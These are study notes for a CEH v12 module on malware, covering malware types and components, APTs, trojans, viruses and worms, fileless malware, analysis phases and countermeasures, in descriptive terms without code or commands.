CEHv12-07 - Malware

Malware concepts and components

Short for “malicious software.” It refers to any software that performs harmful actions on a computer system or network. It can take various forms, and while all viruses are malware, not all malware are viruses.

• Common types:

  • Trojan: appears innocuous or even useful but contains hidden malicious code (e.g., like a Tootsie Pop with smallpox inside).
  • Virus: malicious program that spreads through human interaction (e.g., email attachments, USB drives). It spreads when shared with others.
  • Worm: similar to viruses but can propagate itself without human interaction. Worms often exploit vulnerabilities like remote code execution (RCE).
  • Ransomware: encrypts a victim’s data and demands payment (often in Bitcoin) for decryption. Example: WannaCry.
  • Adware: software that displays unwanted advertisements, often gathering data on your habits. It may not be strictly malicious but is often annoying and invasive.
  • Spyware: gathers information about users without consent, typically for advertising purposes.

• Components:

  • Downloader: non-malicious program that downloads harmful files from the internet.
  • Dropper: contains malicious code and installs malware onto the target system.
  • Obfuscator: makes the malware code unreadable to prevent detection by security systems.
  • Cryptor: encrypts malware code to prevent analysis; the code must be decrypted to understand its function.
  • Payload: actual malicious action the malware carries out (e.g., encrypting files, exfiltrating data).
  • Exploit: known vulnerability in software that malware may use to spread (e.g., EternalBlue used by WannaCry).

• Propagation methods:

  1. Email Attachments: A common way for malware to spread is via malicious email attachments or links.
  2. Software Installations from Untrusted Sources: Downloading software from torrents or other untrusted sources can lead to malware infections.
  3. Exploiting Software Vulnerabilities: Malware can use known vulnerabilities in software to spread automatically (e.g., EternalBlue in WannaCry).

• Real-world examples

  • Ransomware: targets industries like healthcare and education. The shift from encrypting files to exfiltrating data and threatening to release it on the dark web is becoming more common.
  • Famous malware: BlackEnergy, Cryptolockers, and the Equation Group. A GitHub repository, “thezoo,” hosts a variety of real-world malware samples for analysis (e.g., Fancy Bear, Petya, WannaCry).

APT

Advanced Persistent Threats (APTs) are sophisticated, persistent, and malicious cyber threats typically orchestrated by well-organized groups. These groups are highly skilled and have specific objectives such as data exfiltration, espionage, or financial gain. APTs may use malware specifically developed for their campaigns, such as custom zero-day exploits Some APTs may also be associated with state-sponsored activities, such as Stuxnet, which was a state-sponsored malware but not considered an APT.

• Key characteristics:

  • Advanced: high-level skills and custom exploits are often used.
  • Persistent: they maintain long-term access to the target systems.
  • Threat: their goal is to execute malicious activities without being detected.

• Groups: see MITRE APT Groups.

  • APT28 (Fancy Bear): Russian hacking group.
  • Lazarus Group (APT38): North Korean group.
  • Lapsus: non-state-sponsored group, notable for hacking companies like Okta and Nvidia.

• Targets:

  • Sensitive Information: personal or state secrets, intellectual property, and financial data.
  • Corporate Espionage: stealing research and development information to gain a competitive advantage.
  • Political Goals: activists may engage in politically motivated attacks.

• Behavior:

  • Long-Term Access: APTs aim to stay undetected for as long as possible, often going unnoticed until they strike.
  • Patience: Attackers are methodical and patient, gathering intelligence over time before launching their attack.
  • High Skill Level: attackers are highly skilled in areas such as zero-day exploit development, evading detection, and using multi-stage attacks.

• Lifecycle:

  1. Preparation:
     • Target Selection: intelligence gathering and testing tools for evading detection.
     • Tool Creation: developing custom malware and testing against security defenses (EDRs, AV).
  2. Initial Intrusion: deploying malware and establishing a connection to the target system.
  3. Expansion: gaining further access by acquiring credentials and expanding across the network.
  4. Persistence: maintaining long-term access through various persistence techniques.
  5. Exfiltration: gathering and transferring sensitive information to external systems controlled by the attackers.
  6. Cleanup: covering tracks by erasing log files and removing evidence of the intrusion.

Trojans

• Definition: type of malware that masquerades as legitimate software but contains a malicious payload. The name is derived from the Greek myth of the Trojan Horse, where enemies hid inside to infiltrate the city. In the case of Trojans, the “horse” is digital.

  • Function: Malicious software disguised as a legitimate program to trick users into installing it.
  • Propagation: Does not self-replicate; relies on social engineering to spread.

• Dessign: there are different types of malicious software designed to install other malware on a target system. Here’s a brief explanation of the differences between them:

  • Dropper:
    • Function: a dropper is a type of malware designed to install another malicious payload on the victim’s system. It typically carries the malicious payload within its own code.
    • Operation: once executed, the dropper extracts and installs the payload directly onto the system.
    • Payload Delivery: the payload is usually embedded within the dropper itself, making it a self-contained malware delivery mechanism.
  • Downloader:
    • Function: A downloader is a type of malware that, upon execution, retrieves additional malicious software from the internet or another network location.
    • Operation: The downloader contacts a remote server to download the additional malware, which it then installs on the system.
    • Payload Delivery: Unlike droppers, downloaders do not contain the malicious payload initially; they fetch it from an external source after being executed.
  • Cryptors: tools or components used to encrypt malicious payloads. The primary purpose of a cryptor is to obfuscate malware to evade detection by antivirus software and other security mechanisms. Cryptors work by transforming the code of the malware into a format that is not recognizable by signature-based detection methods. Once the encrypted payload reaches the target system, the cryptor decrypts it, allowing the malware to execute.
    • Key Differences:
    • Embedded Payload: Droppers contain the payload within themselves, while downloaders fetch the payload from an external location.
    • Network Activity: Downloaders require network access to download the additional malware, whereas droppers do not necessarily need network access to deliver the payload.

• Types:

  • Remote Access Trojans (RATs)**.
  • Mobile trojans**.
  • IoT botnet trojans**.
  • Banking trojans**.
  • Denial of Service trojans**.
  • Backdoor trojans**.

• Purpose: trojans are used for a variety of malicious activities, including:

  • Disabling Firewalls/IDS to gain deeper access.
  • Installing More Malware as a prelude to further attacks like ransomware.
  • Establishing Command and Control (C2) communications for remote control.
  • Spying via keystroke logging, camera/audio hijacking, and browsing monitoring.
  • Blackmail/Extortion based on sensitive activities.
  • Storage Theft by using a victim’s device to store malicious data.
  • Destruction via “wipers” that erase data or disable the system.
  • Denial of Service (DoS) attacks or botnet creation.
  • Theft of sensitive data (PII, PHI, financials).

• Deploy methods:

  • Dropper: Initial benign malware that drops a more malicious payload.
  • Downloader: Malware that downloads the second-stage Trojan from a remote source.
  • Rapper: A program that contains a Trojan hidden within a seemingly harmless application.
  • Cryptor: Malicious code encrypted to evade antivirus detection, which decrypts and executes the code at runtime.

• Infection methods: trojans are often spread through social engineering tactics, such as:

  • Malicious Links: Emails or websites that trick users into clicking a link or downloading an attachment.
  • Macros: Embedded in documents that, when opened, execute the malicious code.
  • Fake Software: Promises of free software that instead install a Trojan (e.g., fake media player or games).

Viruses and worms

• Concepts:

  • Virus: malicious software that attaches itself to a host file or program. It is self-replicating but requires human interaction (e.g., clicking on a file) to activate. Once activated, it spreads to other files.
  • Worm: self-replicating malware that spreads independently through software vulnerabilities without requiring human interaction.

• Goals:

  • Destruction of systems.
  • Cyber theft.
  • Hacktivism.
  • Chaos or “watching the world burn”.

• Symptoms of infection

  • Poor system performance (e.g., high CPU usage, disk space depletion).
  • Random system crashes.
  • Missing data or deleted files (e.g., documents).

• Lifecycle:

  1. Design: Virus developers design and build new viruses.
  2. Replication: The virus spreads to new files or systems.
  3. Launch: The virus is executed when a user runs the infected file.
  4. Detection: Security teams discover and analyze the virus.
  5. Incorporation: Antivirus software updates to detect and protect against the new virus.
  6. Execution of Damage Routine: Antivirus software removes the virus.

• Common types:

  • Boot Sector Viruses: Infect boot sectors of disks. Example: “Elk Cloner.”
  • File-Level Viruses: Spread through infected files. Example: Attachments or programs that carry viruses.
  • Macro Viruses: Exploit application macros (e.g., Excel, Word) to run malicious code.

• Advanced types:

  • Polymorphic Viruses: Use encryption to change their signature, making them harder to detect (e.g. WannaCry, CryptoLocker).
  • Metamorphic Viruses: Completely rewrite their code, avoiding detection by changing their structure.
  • Logic Bombs: Malicious code that triggers on a specific event or time.
  • Ransomware: A type of virus that encrypts files and demands a ransom to unlock them.

Fileless malware

In simple words, The malicious code being executed is being pushed into a memory space and never touching the disk.

• Characteristics:

  • No Files on Disk: Operates without leaving files on the hard drive.
  • Memory-Resident: Persists in the system’s RAM.
  • Leverages Legitimate Tools: Uses built-in system tools like PowerShell, WMI (Windows Management Instrumentation), and macros within Office documents.
  • Evades Detection: Bypasses traditional antivirus solutions that scan for malicious files on disk.

• Attack vectors:

  1. Phishing emails: contain malicious links or attachments that, when opened, execute fileless malware.
  2. Exploiting vulnerabilities: utilizes security flaws in software to execute code directly in memory.
  3. Malicious Macros: embedded in documents (e.g., Word or Excel) that execute scripts when the document is opened.
  4. PowerShell Scripts: PowerShell commands or scripts executed to perform malicious activities.

• Entry Points for Fileless Malware:

  • Exploits: File-based or fileless payloads.
  • Network-Based: Exploiting remote vulnerabilities (e.g., buffer overflow).
  • Hardware: Malware targeting firmware of devices.
  • Execution and Injection:
    • File-based: Executables used in memory.
    • Macro-based: VBA macros, often in Word/Excel files.
    • Script-based: PowerShell, Bash, Python, etc.
    • Disk-based: Rootkit infections through boot records.

• Process of infection:

  1. Entry Point: Exploits like EternalBlue, phishing emails, or malicious websites.
  2. Code Execution: Uses scripts (e.g., PowerShell, WMIC) to execute malicious actions.
  3. Persistence: Maintains access via registry entries or scheduled tasks.
  4. Objectives: Data exfiltration, reconnaissance, or cyber espionage.

• Common tactics: attackers often obfuscate their code by modifying characters or using legitimate processes to avoid detection by security systems. This approach enables fileless malware to execute without leaving traces on disk, making it difficult for traditional security solutions to detect.

• Classification:

  • By evidence:
    • No file activity performed.
    • Indirect file activity: Using legitimate files which are supposed to be on the system and modifying these files to run some malicious code but still in the memory space.
    • Files required: This file is not malicious and doesn’t raise red flags, but it reaches to the internet, grap a malicious file, and read the content of that file into the memory, so basically nothing malicious is touching the disk.
  • By Entry Points:
    • Exploits & Network-based.
    • Hardware: eg. Spreading through infected USB drives.
    • Execution & Injection (macro based, script based, disk based).

• Types: fileless malware can be categorized based on the techniques it employs and the components it targets:

  1. Memory-Resident Malware: operates entirely in memory without writing files to the disk (e.g. worms that propagate through network connections and remain in the RAM of infected systems).
  2. Script-Based Malware: uses scripts (e.g., PowerShell, JavaScript, VBScript) to execute malicious activities.
  3. Registry-Resident Malware: stores malicious code or scripts in the Windows Registry for persistence (e.g. writes base64-encoded PowerShell commands to the registry and executes them using regsvr32.exe).
  4. Reflective DLL Injection: injects Dynamic Link Libraries (DLLs) directly into the memory of running processes without writing to disk (e.g. DLL injection).
  5. Living off the Land (LoL) Attacks: exploits legitimate system tools and software to carry out malicious activities (e.g. using wmic.exe, powershell.exe, or mshta.exe to download and execute malicious scripts).
  6. Office Document Macros: embeds malicious macros in Office documents (e.g., Word, Excel) that execute when the document is opened (e.g. Word document with a malicious VBA macro that executes PowerShell commands).
  7. Bootkits: reside in the system’s boot sector or bootloader, often leveraging firmware or system-level exploits (e.g. infect the Master Boot Record (MBR) to load its payload directly into memory during the boot process).
  8. Browser-Based Fileless Malware: executes through web browsers using malicious scripts or exploits delivered via websites (e.g. JavaScript payload).

• Examples

  1. Poweliks: uses registry keys to store and execute malicious PowerShell scripts.
  2. SamSam* ransomware that exploits vulnerabilities to run in memory and encrypt files.
  3. Kovter: ad-fraud malware that maintains persistence through registry manipulation.
  4. Powersniff: uses malicious PowerShell scripts to download and execute payloads directly in memory.

Malware analysis

• Phases:

  • Discovery phase:
    1. Initial Detection: malware discovery may be triggered by antivirus (AV), endpoint detection and response (EDR) systems, or user reports of suspicious activity.
    2. Indicators of Infection:
       • Files with strange behavior (e.g., ransomware locking files).
       • AV or IDS/IPS systems detecting unusual activities like command and control (C2) connections.
       • User complaints such as unexpected system behavior or ransom notes.
    3. Sheep Dipping:
       • The process of scanning and disinfecting infected devices (referred to as “cyber sheep”).
       • AV and monitoring systems like network traffic analysis are used to check for suspicious activity.
       • Quarantined devices undergo thorough analysis before being allowed back into the network.
  • Study/Analysis phase:
    1. Static Analysis: this involves analyzing the file without executing it:
       • File Hashing: files are hashed (e.g., using md5sum), and hashes are checked against known virus signatures in services like VirusTotal.
       • File Type Identification: tools like file help identify file formats (e.g., ELF for Linux, PE for Windows).
       • Suspicious Strings: searching for human-readable text strings within the code (e.g., bin sh could indicate a shell process).
       • Obfuscation Detection: malware often obfuscates its code to avoid detection by AV systems.
    2. Dynamic Analysis: involves running the malware to observe its behavior:
       • File System Behavior: what files does it create or modify? Does it delete files or consume system resources (e.g., CPU, memory)?
       • Network Activity: monitoring for any network traffic indicating command and control (C2) communication or data exfiltration.
       • System Calls: tools like S-trace can trace system calls and monitor what resources the malware requests from the operating system.

• Tools:

• VirusTotal: popular service for scanning files by their hash against multiple antivirus engines.
• Hybrid Analysis: similar to VirusTotal, offering insights into file behaviors.
• S-trace]: useful for tracking system calls during dynamic analysis to detect what resources are being accessed.
• IDAPRO/Ghidra: reverse engineering tools used for deeper analysis of malware code.

• Important concepts:
• Obfuscation: malware may use techniques like Base64 encoding or PowerShell obfuscation to avoid detection.
• Sandboxing: running malware in an isolated environment is essential to prevent it from affecting real systems. It’s important to use either physical isolation or virtualization to safely analyze potentially dangerous files.

Malware countermeasures

1. Updates and Patches:
   • Keeping software and systems updated is crucial to defend against malware, as malware often exploits known vulnerabilities.
   • Establish a patch policy with scheduled updates. Neglecting updates increases vulnerability to attacks.
   • Automatic updates can help ensure systems stay secure.
2. Anti-malware Tools:
   • Use anti-virus, anti-malware, and EDR (Endpoint Detection and Response) solutions to detect and block malicious activity.
   • Windows Security is a built-in tool for virus and threat protection. Ensure real-time protection and regular updates.
3. User Awareness and Training:
   • Train employees to avoid phishing emails, suspicious links, and unknown attachments. User behavior is a major vector for malware infection.
   • Implement security awareness sessions to help employees identify and handle threats.
4. Backups:
   • Regular backups are essential to recover from data loss or ransomware attacks.
   • Implement a defined backup schedule, including offsite backups and remote replication.
5. Logging and Monitoring:
   • Monitor systems using IDS/IPS, file integrity monitors, and network traffic analysis tools (e.g., Wireshark, SolarWinds).
   • Use SIEM systems (e.g., Splunk, AlienVault) to aggregate and analyze logs, enabling quick detection of security incidents.
6. Blocking Malicious Activity:
   • Block untrusted applications and network connections using whitelisting/blacklisting or firewall rules.
   • Disable unnecessary services (e.g., PowerShell) to minimize attack surfaces.